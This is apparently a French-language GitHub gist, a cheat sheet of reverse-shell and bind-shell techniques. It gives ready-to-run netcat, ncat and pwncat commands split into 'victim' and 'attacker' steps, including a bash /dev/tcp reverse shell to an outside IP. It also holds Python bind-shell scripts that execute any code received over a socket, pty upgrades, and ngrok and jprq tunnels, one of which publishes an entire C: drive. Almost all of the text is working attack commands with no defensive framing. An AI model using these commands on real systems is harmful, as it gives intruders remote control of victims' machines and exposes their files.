Skip to content

Instantly share code, notes, and snippets.

@YannBouyeron

YannBouyeron/Cat_&_grok_tuto.md

Last active February 20, 2023 09:13
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save YannBouyeron/5e8ca6651ab653b7efb96b038d87ffc9 to your computer and use it in GitHub Desktop.
Save YannBouyeron/5e8ca6651ab653b7efb96b038d87ffc9 to your computer and use it in GitHub Desktop.
Download ZIP
Reverse Shell, Bind Shell, Ncat, Pwncat, Ngrok, & JPRQ tutoriel
Raw
Cat_&_grok_tuto.md

REVERSE SHELL

Netcat reverse Shell

Console victime:

/bin/bash -i > /dev/tcp/192.168.43.92/4444 0<&1 2>&1

Console attacker:

Avec netcat

nc -n -vv -l -p 4444

Avec ncat

ncat --keep-open --listen -p 4444

Dans la console de l’attacker (pty shell):

python3 -c 'import pty; pty.spawn("/bin/bash")'

Pwncat reverse shell

Victime:

pwncat -e '/bin/bash' 192.168.43.92 8080 --reconn

Attacker:

pwncat -l 0.0.0.0 4444

Dans la console de l’attacker (pty shell):

python3 -c 'import pty; pty.spawn("/bin/bash")'

BIND SHELL

Python / netcat bind Shell

Victime run python file:

On linux victime:

import socket as a

s = a.socket()

s.bind(('0.0.0.0',4444))

s.listen(1)

(r,z) = s.accept()

exec(r.recv(999))

On windows victime:

import socket as a

s = a.socket()

s.bind(('0.0.0.0', 4444))

s.listen(1)

while True:

	(r, z) = s.accept()
	
	try:
		exec(r.recv(999))
	
	except BaseException:
	
		pass

Attacher:

nc -v host port

import pty,os;os.dup2(r.fileno(),0);os.dup2(r.fileno(),1);os.dup2(r.fileno(),2);pty.spawn("/bin/bash");s.close()

Ncat / netcat bind shell

Victime:

ncat -nvlp 4444 -e /bin/sh

Attacker:

nc -v 127.0.0.1 4444  #ou ncat -v 127.0.0.1 4444

python3 -c 'import pty; pty.spawn("/bin/bash")'

Pwncat bind shell

Victime:

pwncat -l -e '/bin/bash' 4444 -k

Attacker:

pwncat <victimeIP> 4444         

python3 -c 'import pty; pty.spawn("/bin/bash")'

Pwncat autres...

Envoyer une seul commande , récupérer la réponse et fermer la connexion coté attacker:

echo "ls -l" | pwncat localhost 4444

Ou

echo "ls -l" | nc -w2 localhost 4444

Ou

echo "ls -l" | ne -q4 localhost 4444

NGROK

from pyngrok import ngrok

>>> ngrok.set_auth_token("<your token>")

>>> t = ngrok.connect(5544, "tcp")

>>> t.public_url
'tcp://8.tcp.ngrok.io:19520'

>>> ngrok.get_tunnels()
[<NgrokTunnel: "tcp://8.tcp.ngrok.io:19520" -> "localhost:5544">]

>>> ngrok.kill()

Le token est indispensable pour du TCP ou pour lancer plusieurs services. (Pour un seul http le token n’est pas utile sur debian)

File server:

>>> ngrok.connect("file:///home/pi/", auth="someID:somesecret")

Depuis la console:

py -c "from pyngrok import ngrok; ngrok.connect(\"file:///C:\"); t = ngrok.get_tunnels(); print(t)"

En une ligne inside python

>>> from pyngrok import ngrok; ngrok.connect("file:///C:"); t = ngrok.get_tunnels(); print(t)

JPRQ

pip3 install jprq

jprq http 8080 -s=mysubdomain &

or:

jprq tcp 6680 &

Ou avec binaries (exemple pour arm, mais d'autres binaires sont disponibles)

wget https://github.com/azimjohn/jprq/releases/download/1.1.0/jprq-linux-arm

chmod 777 jprq-linux-arm

jprq-linux-arm -subdomain mysub http 8080

Ou avec 2 tirets - -

jprq-linux-arm -—subdomain mysub http 8080

Ou:

jprq-linux-arm --subdomain=mysub http 8080

Ou inside python:

>>> import jprq.__main__

>>> import asyncio

>>> host = 'open.jprq.io'

>>> port = 4736

>>> username = 'mysubdomain'

>>> __version__ = '2.0.1'

>>> ws = f'wss://{host}/_ws/?username={username}&port={port}&version={__version__}'

>>> asyncio.run(jprq.main.open_http_tunnel(ws, "http://0.0.0.0:4736"))
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment